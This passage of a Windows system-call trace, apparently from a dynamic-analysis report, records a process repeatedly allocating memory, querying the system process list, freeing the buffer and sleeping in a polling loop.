RegionSize=0xdea54*=0x20000) returned 0x0 [0214.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.327] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.334] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.341] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.343] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.343] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.344] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.344] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.344] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.348] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.376] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.383] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.391] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.409] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.418] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.420] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.420] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.439] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.441] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.448] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.468] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.487] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.488] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0214.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0214.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0214.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0214.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0214.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0214.500] 